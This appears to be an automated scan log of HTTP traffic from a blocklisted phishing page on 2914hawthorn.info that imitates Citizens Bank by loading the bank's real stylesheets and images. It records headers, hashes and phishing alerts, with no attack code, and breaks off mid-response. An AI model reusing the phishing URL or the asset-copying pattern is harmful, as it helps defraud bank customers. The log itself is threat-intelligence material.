                                         69.49.244.31
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Date: Fri, 30 Sep 2022 21:47:51 GMT
Server: Apache
Last-Modified: Mon, 18 Jan 2021 20:00:58 GMT
Accept-Ranges: bytes
Content-Length: 1294
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive


--- Additional Info ---
Magic:  ASCII text, with CRLF line terminators
Size:   1294
Md5:    6224e21da3d6cf2f5de0debf15e42489
Sha1:   a97a3034a530ad6fa3c5967fe46648dbbeaa71c4
Sha256: 70e85a009826725354b61dda5e78f14418a117f6d4646550d2c55c499ec64a50

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
                                            POST / HTTP/1.1 
Host: ocsp.entrust.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 71
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         104.110.10.32
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
ETag: "7F05BFA8E5648EBEE1A47EAF3E38CBEEB0E19B18E10B4429536C6FC58AB16284"
Last-Modified: Fri, 30 Sep 2022 11:00:00 UTC
Content-Length: 1566
Cache-Control: public, no-transform, must-revalidate, max-age=3592
Expires: Fri, 30 Sep 2022 22:47:45 GMT
Date: Fri, 30 Sep 2022 21:47:53 GMT
Connection: keep-alive


--- Additional Info ---
Magic:  data
Size:   1566
Md5:    5a9c2cedf4fe49124887fb161141f8ee
Sha1:   2f61c5d0c38bcb6c06f1ece719fc79392e4212c2
Sha256: 7f05bfa8e5648ebee1a47eaf3e38cbeeb0e19b18e10b4429536c6fc58ab16284
                                        
                                            POST / HTTP/1.1 
Host: ocsp.entrust.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 71
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         104.110.10.32
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
ETag: "7F05BFA8E5648EBEE1A47EAF3E38CBEEB0E19B18E10B4429536C6FC58AB16284"
Last-Modified: Fri, 30 Sep 2022 11:00:00 UTC
Content-Length: 1566
Cache-Control: public, no-transform, must-revalidate, max-age=3600
Expires: Fri, 30 Sep 2022 22:47:53 GMT
Date: Fri, 30 Sep 2022 21:47:53 GMT
Connection: keep-alive


--- Additional Info ---
Magic:  data
Size:   1566
Md5:    5a9c2cedf4fe49124887fb161141f8ee
Sha1:   2f61c5d0c38bcb6c06f1ece719fc79392e4212c2
Sha256: 7f05bfa8e5648ebee1a47eaf3e38cbeeb0e19b18e10b4429536c6fc58ab16284
                                        
                                            POST / HTTP/1.1 
Host: ocsp.entrust.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 71
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         104.110.10.32
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
ETag: "7F05BFA8E5648EBEE1A47EAF3E38CBEEB0E19B18E10B4429536C6FC58AB16284"
Last-Modified: Fri, 30 Sep 2022 11:00:00 UTC
Content-Length: 1566
Cache-Control: public, no-transform, must-revalidate, max-age=3600
Expires: Fri, 30 Sep 2022 22:47:53 GMT
Date: Fri, 30 Sep 2022 21:47:53 GMT
Connection: keep-alive


--- Additional Info ---
Magic:  data
Size:   1566
Md5:    5a9c2cedf4fe49124887fb161141f8ee
Sha1:   2f61c5d0c38bcb6c06f1ece719fc79392e4212c2
Sha256: 7f05bfa8e5648ebee1a47eaf3e38cbeeb0e19b18e10b4429536c6fc58ab16284
                                        
                                            POST / HTTP/1.1 
Host: ocsp.digicert.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         93.184.220.29
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Accept-Ranges: bytes
Age: 2951
Cache-Control: 'max-age=158059'
Date: Fri, 30 Sep 2022 21:47:53 GMT
Last-Modified: Fri, 30 Sep 2022 20:58:42 GMT
Server: ECS (ska/F6FD)
X-Cache: HIT
Content-Length: 471

                                        
                                            GET /efs/efs/jsp-ns/inc/css/normalize.css HTTP/1.1 
Host: www3.citizensbankonline.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://2914hawthorn.info/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         104.110.3.220
HTTP/2 200 OK
content-type: text/css
                                        
accept-ranges: bytes
access-control-allow-origin: *
content-encoding: br
etag: "26c2-5e885b034be9a"
last-modified: Tue, 27 Sep 2022 20:00:17 GMT
server: Akamai Resource Optimizer
vary: Accept-Encoding
x-frame-options: SAMEORIGIN
x-olb-req-duration: D=489
x-olb-req-received: t=1664242473123773
content-length: 2300
cache-control: max-age=20055
expires: Sat, 01 Oct 2022 03:22:08 GMT
date: Fri, 30 Sep 2022 21:47:53 GMT
server-timing: cdn-cache; desc=HIT, edge; dur=1
strict-transport-security: max-age=15768000
lb-action: None, None
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text
Size:   2300
Md5:    0a445a15e0f09a7738952731fdf3fe9d
Sha1:   3d4cef20189303cc4f24c27da1b8d2043e700cea
Sha256: 173f4f410b46ca6211eee490747009c597b7d7c475bcac07df88a18521bbef54
                                        
                                            GET /efs/efs/jsp-ns/inc/css/flows.css HTTP/1.1 
Host: www3.citizensbankonline.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://2914hawthorn.info/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         104.110.3.220
HTTP/2 200 OK
content-type: text/css
                                        
accept-ranges: bytes
access-control-allow-origin: *
content-encoding: br
etag: "21ce-5e885b034efbf"
last-modified: Tue, 27 Sep 2022 01:39:47 GMT
server: Akamai Resource Optimizer
vary: Accept-Encoding
x-frame-options: SAMEORIGIN
x-olb-req-duration: D=456
x-olb-req-received: t=1664242472984541
content-length: 1975
cache-control: max-age=44056
expires: Sat, 01 Oct 2022 10:02:09 GMT
date: Fri, 30 Sep 2022 21:47:53 GMT
server-timing: cdn-cache; desc=HIT, edge; dur=1
strict-transport-security: max-age=15768000
lb-action: None, None
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  Unicode text, UTF-8 text
Size:   1975
Md5:    07507f946ee4b2b9d4affc283b431119
Sha1:   00218cebeb305b00ae4ef74e4a67957d3c43e6f2
Sha256: 44fb4d44ce9291066e686a9861b8b31f021c816fa60e97c613bf5aadcc8e2830
                                        
                                            GET /efs/efs/jsp-ns/inc/css/main.css HTTP/1.1 
Host: www3.citizensbankonline.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://2914hawthorn.info/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         104.110.3.220
HTTP/2 200 OK
content-type: text/css
                                        
accept-ranges: bytes
access-control-allow-origin: *
content-encoding: br
etag: "f405-5e885b034ff5f"
last-modified: Tue, 27 Sep 2022 01:56:45 GMT
server: Akamai Resource Optimizer
vary: Accept-Encoding
x-frame-options: SAMEORIGIN
x-olb-req-duration: D=2179
x-olb-req-received: t=1664242473065180
content-length: 10382
cache-control: max-age=44055
expires: Sat, 01 Oct 2022 10:02:08 GMT
date: Fri, 30 Sep 2022 21:47:53 GMT
server-timing: cdn-cache; desc=HIT, edge; dur=1
strict-transport-security: max-age=15768000
lb-action: None, None
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text
Size:   10382
Md5:    e8a5a242bcaea8c7314ccbb04612d922
Sha1:   101e2286a81e108dd00c618032d793b2dc5366b3
Sha256: 8e2a305132b87d2a48461f8e3d820dbf640d66d530ab007632c5c5d79ce8cdc7
                                        
                                            GET /efs/efs/jsp-ns/inc/css/ad-containers.css HTTP/1.1 
Host: www3.citizensbankonline.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://2914hawthorn.info/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         104.110.3.220
HTTP/2 200 OK
content-type: text/css
                                        
accept-ranges: bytes
access-control-allow-origin: *
content-encoding: br
etag: "1dd4-5e885b034ed75"
last-modified: Tue, 27 Sep 2022 02:26:36 GMT
server: Akamai Resource Optimizer
vary: Accept-Encoding
x-frame-options: SAMEORIGIN
x-olb-req-duration: D=400
x-olb-req-received: t=1664242473687426
content-length: 1227
cache-control: max-age=44055
expires: Sat, 01 Oct 2022 10:02:08 GMT
date: Fri, 30 Sep 2022 21:47:53 GMT
server-timing: cdn-cache; desc=HIT, edge; dur=1
strict-transport-security: max-age=15768000
lb-action: None, None
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text
Size:   1227
Md5:    e9404d7ddc1ef0b93851879620bfea8a
Sha1:   69575dd0119d3439f3d7ba4b45d12a3c0e47a39e
Sha256: f5be5cfcdb9f541d6e355cd15b78204e715c979bb90a7dbae94d18c9bdad8772
                                        
                                            GET /efs/efs/jsp-ns/inc/css/jquery-ui-1.10.3.custom.min.css HTTP/1.1 
Host: www3.citizensbankonline.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://2914hawthorn.info/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         104.110.3.220
HTTP/2 200 OK
content-type: text/css
                                        
accept-ranges: bytes
access-control-allow-origin: *
content-encoding: br
etag: "4a56-5e885b034f92d"
last-modified: Tue, 27 Sep 2022 19:42:38 GMT
server: Akamai Resource Optimizer
vary: Accept-Encoding
x-frame-options: SAMEORIGIN
x-olb-req-duration: D=819
x-olb-req-received: t=1664242473021567
content-length: 3118
cache-control: max-age=21062
expires: Sat, 01 Oct 2022 03:38:55 GMT
date: Fri, 30 Sep 2022 21:47:53 GMT
server-timing: cdn-cache; desc=HIT, edge; dur=1
strict-transport-security: max-age=15768000
lb-action: None, None
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (17412)
Size:   3118
Md5:    ac9a70a6f100c02749dfadb709b6eadf
Sha1:   69906e55ace36c217a52d428029a3c71dc16a7e4
Sha256: 466e6cf44306264c98e5642f77be87292e03e578ce78b17c0b39521460b1d37a
                                        
GET /efs/hhf/img/CTZ_Green-01.png HTTP/1.1
Host: www3.citizensbankonline.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://2914hawthorn.info/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers

                                         
104.110.3.220
HTTP/2 200 OK
content-type: image/png
x-frame-options: SAMEORIGIN
last-modified: Sat, 10 Sep 2022 01:48:17 GMT
etag: "149d-5e848db420aa2"
accept-ranges: bytes
content-length: 5277
x-olb-req-received: t=1664242473041815
x-olb-req-duration: D=105
access-control-allow-origin: *
cache-control: max-age=272936
expires: Tue, 04 Oct 2022 01:36:49 GMT
date: Fri, 30 Sep 2022 21:47:53 GMT
server-timing: cdn-cache; desc=HIT, edge; dur=1
strict-transport-security: max-age=15768000
lb-action: None
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  PNG image data, 406 x 50, 8-bit/color RGBA, non-interlaced\012- data
Size:   5277
Md5:    beb4d1c9f430bb08a4ed54df069e8f0c
Sha1:   39950ddd690d1cbe2d08610da5c11c854450523f
Sha256: bf99a3203217c802888087df8a2c84b92e087829e7e24d38581a57cee763923b
                                        
GET /efs/hhf/img/footer-follow-facebook.png HTTP/1.1
Host: www3.citizensbankonline.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://2914hawthorn.info/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers

                                         
104.110.3.220
HTTP/2 200 OK
content-type: image/png
x-frame-options: SAMEORIGIN
last-modified: Sat, 10 Sep 2022 01:48:17 GMT
etag: "18b-5e848db420e8a"
accept-ranges: bytes
content-length: 395
x-olb-req-received: t=1664242473020178
x-olb-req-duration: D=100
access-control-allow-origin: *
cache-control: max-age=272792
expires: Tue, 04 Oct 2022 01:34:25 GMT
date: Fri, 30 Sep 2022 21:47:53 GMT
server-timing: cdn-cache; desc=HIT, edge; dur=3
strict-transport-security: max-age=15768000
lb-action: None
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  PNG image data, 28 x 21, 8-bit/color RGB, non-interlaced\012- data
Size:   395
Md5:    25dbaaa7fa1bf41ca6614f1d2cf699f5
Sha1:   56a9e2459a275ef7178ff8c90c2b277265f64fb0
Sha256: eb175662762ef5f2c9011cc1c4f9d09361c50a366fad8a544bda1c439b99d3a0
                                        
GET /efs/hhf/img/footer-follow-twitter.png HTTP/1.1
Host: www3.citizensbankonline.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://2914hawthorn.info/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers

                                         
104.110.3.220
HTTP/2 200 OK
content-type: image/png
x-frame-options: SAMEORIGIN
last-modified: Sat, 10 Sep 2022 01:48:17 GMT
etag: "cdf-5e848db420e8a"
accept-ranges: bytes
content-length: 3295
x-olb-req-received: t=1664242473019524
x-olb-req-duration: D=120
access-control-allow-origin: *
cache-control: max-age=272702
expires: Tue, 04 Oct 2022 01:32:55 GMT
date: Fri, 30 Sep 2022 21:47:53 GMT
server-timing: cdn-cache; desc=HIT, edge; dur=4
strict-transport-security: max-age=15768000
lb-action: None
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  PNG image data, 25 x 21, 8-bit/color RGBA, non-interlaced\012- data
Size:   3295
Md5:    ab8d8dc7ea3d7b572b2dc47f2aebe5ae
Sha1:   900c9f837d9a015e6609b14eed6d99c384ec5441
Sha256: 9b4ffac9ea755d2aaff724fa471d90fd63ae5648e18f60a67db0a5c3bffd84e5
                                        
GET /efs/hhf/img/footer-follow-linkedin.png HTTP/1.1
Host: www3.citizensbankonline.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://2914hawthorn.info/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers

                                         
104.110.3.220
HTTP/2 200 OK
content-type: image/png
x-frame-options: SAMEORIGIN
last-modified: Sat, 10 Sep 2022 01:48:17 GMT
etag: "ca7-5e848db420e8a"
accept-ranges: bytes
content-length: 3239
x-olb-req-received: t=1664242473775530
x-olb-req-duration: D=143
access-control-allow-origin: *
cache-control: max-age=272719
expires: Tue, 04 Oct 2022 01:33:12 GMT
date: Fri, 30 Sep 2022 21:47:53 GMT
server-timing: cdn-cache; desc=HIT, edge; dur=3
strict-transport-security: max-age=15768000
lb-action: None
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  PNG image data, 25 x 21, 8-bit/color RGBA, non-interlaced\012- data
Size:   3239
Md5:    b187d1cd61b1912b22ebfb4efce30bad
Sha1:   b502a6ed3e50ffe6da8d8d5114fd404650d38ea7
Sha256: fe3ddc37707c93f338a1f6359dfa03019e096df14454808aaccbb7538aa3c67b
                                        
GET /efs/hhf/img/footer-follow-youtube.png HTTP/1.1
Host: www3.citizensbankonline.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://2914hawthorn.info/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers

                                         
104.110.3.220
HTTP/2 200 OK
content-type: image/png
x-frame-options: SAMEORIGIN
last-modified: Sat, 10 Sep 2022 01:48:17 GMT
etag: "cce-5e848db420e8a"
accept-ranges: bytes
content-length: 3278
x-olb-req-received: t=1664242473773232
x-olb-req-duration: D=131
access-control-allow-origin: *
cache-control: max-age=272774
expires: Tue, 04 Oct 2022 01:34:07 GMT
date: Fri, 30 Sep 2022 21:47:53 GMT
server-timing: cdn-cache; desc=HIT, edge; dur=2
strict-transport-security: max-age=15768000
lb-action: None
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  PNG image data, 25 x 21, 8-bit/color RGBA, non-interlaced\012- data
Size:   3278
Md5:    09c8c4f0f417a049b8ab6acdd2581717
Sha1:   2c9dbf84a80167a9c7b41e5955969dd4d1d75c6f
Sha256: 9af5181113e5d0eacfc3d9c0b3ad627dc3ad50708755fbe45ab18e0cad4f3b36
                                        
GET /efs/hhf/img/elh.gif HTTP/1.1
Host: www3.citizensbankonline.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://2914hawthorn.info/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers

                                         
104.110.3.220
HTTP/2 200 OK
content-type: image/gif
x-frame-options: SAMEORIGIN
last-modified: Sat, 10 Sep 2022 01:58:56 GMT
etag: "599-5e849015def31"
accept-ranges: bytes
content-length: 1433
x-olb-req-received: t=1664242472993815
x-olb-req-duration: D=133
access-control-allow-origin: *
cache-control: max-age=272774
expires: Tue, 04 Oct 2022 01:34:07 GMT
date: Fri, 30 Sep 2022 21:47:53 GMT
server-timing: cdn-cache; desc=HIT, edge; dur=3
strict-transport-security: max-age=15768000
lb-action: None
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  GIF image data, version 89a, 31 x 24\012- data
Size:   1433
Md5:    f79e78d673f51194d9b9021cbc72b5b3
Sha1:   79a917fad527cef8d96af24d142653f2f49109b3
Sha256: 56c43c6f5c8209acd47f355810bca2f9b0fc86c4bbdf1361d60fb2d2e2e66f8c
                                        
GET /efs/hhf/img/fdicFooter.gif HTTP/1.1
Host: www3.citizensbankonline.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://2914hawthorn.info/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers

                                         
104.110.3.220
HTTP/2 200 OK
content-type: image/gif
x-frame-options: SAMEORIGIN
last-modified: Sat, 10 Sep 2022 01:48:17 GMT
etag: "8c5-5e848db420e8a"
accept-ranges: bytes
content-length: 2245
x-olb-req-received: t=1664242473127888
x-olb-req-duration: D=119
access-control-allow-origin: *
cache-control: max-age=272784
expires: Tue, 04 Oct 2022 01:34:17 GMT
date: Fri, 30 Sep 2022 21:47:53 GMT
server-timing: cdn-cache; desc=HIT, edge; dur=2
strict-transport-security: max-age=15768000
lb-action: None
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  GIF image data, version 89a, 56 x 24\012- data
Size:   2245
Md5:    a0742f4f717eac3a1e61f53cbbec74f2
Sha1:   f85639ee91bccd2bddaf043b80c892ae6b700d49
Sha256: dddb031e5144ce20d909dbf4829d637738efa477bf5ab4eab67b1990ef0efb2d
                                        
GET /efs/efs/grafx/icon-secure.png HTTP/1.1
Host: www3.citizensbankonline.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www3.citizensbankonline.com/efs/efs/jsp-ns/inc/css/flows.css
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         
104.110.3.220
HTTP/2 200 OK
content-type: image/png
x-frame-options: SAMEORIGIN
last-modified: Sat, 20 Aug 2022 01:34:05 GMT
etag: "124-5e6a235cbd9f7"
accept-ranges: bytes
content-length: 292
x-olb-req-received: t=1664242473456297
x-olb-req-duration: D=109
access-control-allow-origin: *
cache-control: max-age=272903
expires: Tue, 04 Oct 2022 01:36:16 GMT
date: Fri, 30 Sep 2022 21:47:53 GMT
server-timing: cdn-cache; desc=HIT, edge; dur=2
strict-transport-security: max-age=15768000
lb-action: None
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  PNG image data, 16 x 20, 8-bit/color RGBA, non-interlaced\012- data
Size:   292
Md5:    18ffa7c3d8f40b5da7df780d91930e20
Sha1:   524ca8ffaadbd033fd0504fe580d47315690afa1
Sha256: c8d87d770112e188f7b1482e9a416ffc441a9a6e08e2fc38a886fa2986efdb46
                                        
GET /efs/efs/grafx/flows-tooltip.png HTTP/1.1
Host: www3.citizensbankonline.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www3.citizensbankonline.com/efs/efs/jsp-ns/inc/css/flows.css
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         
104.110.3.220
HTTP/2 200 OK
content-type: image/png
x-frame-options: SAMEORIGIN
last-modified: Sat, 20 Aug 2022 01:34:05 GMT
etag: "16c-5e6a235cbab17"
accept-ranges: bytes
content-length: 364
x-olb-req-received: t=1664242473366493
x-olb-req-duration: D=103
access-control-allow-origin: *
cache-control: max-age=272798
expires: Tue, 04 Oct 2022 01:34:31 GMT
date: Fri, 30 Sep 2022 21:47:53 GMT
server-timing: cdn-cache; desc=HIT, edge; dur=4
strict-transport-security: max-age=15768000
lb-action: None
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  PNG image data, 18 x 18, 8-bit/color RGBA, non-interlaced\012- data
Size:   364
Md5:    35a7359b239ddca8639017dfc4b71b4a
Sha1:   dfdd659f24502fbe7dd79c9564e1e528233fdcad
Sha256: dfc042f7ff75f3c2f916bcfbff48c82834bab07b698a2c564906ca073f8286b2
                                        
GET / HTTP/1.1
Host: push.services.mozilla.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Sec-WebSocket-Version: 13
Origin: wss://push.services.mozilla.com/
Sec-WebSocket-Protocol: push-notification
Sec-WebSocket-Extensions: permessage-deflate
Sec-WebSocket-Key: X/te2qx3E+UwqDyv2tgCpQ==
Connection: keep-alive, Upgrade
Sec-Fetch-Dest: websocket
Sec-Fetch-Mode: websocket
Sec-Fetch-Site: cross-site
Pragma: no-cache
Cache-Control: no-cache
Upgrade: websocket

                                         
52.39.175.179
HTTP/1.1 101 Switching Protocols
Connection: Upgrade
Upgrade: websocket
Sec-WebSocket-Accept: 1dLQnzJZzoU+bP5VMiokoBNyq/c=

                                        
GET /assets/CB_media/images/feedback.png HTTP/1.1
Host: www.citizensbank.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://2914hawthorn.info/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers

                                         
104.110.12.116
HTTP/2 200 OK
content-type: image/png
content-length: 824
last-modified: Wed, 22 Jan 2020 18:38:44 GMT
accept-ranges: bytes
etag: "052b72c53d1d51:0"
server: Microsoft-IIS/10.0
x-powered-by: ASP.NET, ARR/3.0
cache-control: max-age=600
date: Fri, 30 Sep 2022 21:47:53 GMT
server-timing: cdn-cache; desc=HIT, edge; dur=1
strict-transport-security: max-age=15768000
x-robots-tag: none
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced\012- data
Size:   824
Md5:    561da56e59bf569d0f41d6bb9713ce2f
Sha1:   20bee990614a20ae69d2cd21fc9f0688f9fc02e1
Sha256: 713f1268435943170faadadc547d8c68bb00822783e5e0c2d1129972a784f949
                                        
GET /efs/hhf/img/equal-housing.gif HTTP/1.1
Host: 2914hawthorn.info
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://2914hawthorn.info/citi/citizensbankonline.com_deathshortencode/W/
Cookie: PHPSESSID=faa12d036bbaa029941efe16476be2a1
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin

                                         
69.49.244.31
HTTP/1.1 404 Not Found
Content-Type: text/html; charset=iso-8859-1
Date: Fri, 30 Sep 2022 21:47:52 GMT
Server: Apache
Content-Length: 315
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive


--- Additional Info ---
Magic:  HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- exported SGML document, ASCII text
Size:   315
Md5:    a34ac19f4afae63adc5d2f7bc970c07f
Sha1:   a82190fc530c265aa40a045c21770d967f4767b8
Sha256: d5a89e26beae0bc03ad18a0b0d1d3d75f87c32047879d25da11970cb5c4662a3
                                        
GET /efs/hhf/js/citizensHeaderFooter-citizensns44745.js HTTP/1.1
Host: 2914hawthorn.info
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://2914hawthorn.info/citi/citizensbankonline.com_deathshortencode/W/
Cookie: PHPSESSID=faa12d036bbaa029941efe16476be2a1
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin

                                         
69.49.244.31
HTTP/1.1 404 Not Found
Content-Type: text/html; charset=iso-8859-1
Date: Fri, 30 Sep 2022 21:47:52 GMT
Server: Apache
Content-Length: 315
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive


--- Additional Info ---
Magic:  HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- exported SGML document, ASCII text
Size:   315
Md5:    a34ac19f4afae63adc5d2f7bc970c07f
Sha1:   a82190fc530c265aa40a045c21770d967f4767b8
Sha256: d5a89e26beae0bc03ad18a0b0d1d3d75f87c32047879d25da11970cb5c4662a3

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
GET /efs/efs/grafx/arrow-button-white.png HTTP/1.1
Host: www3.citizensbankonline.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www3.citizensbankonline.com/efs/efs/jsp-ns/inc/css/flows.css
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         
104.110.3.220
HTTP/2 200 OK
content-type: image/png
x-frame-options: SAMEORIGIN
last-modified: Sat, 20 Aug 2022 01:34:05 GMT
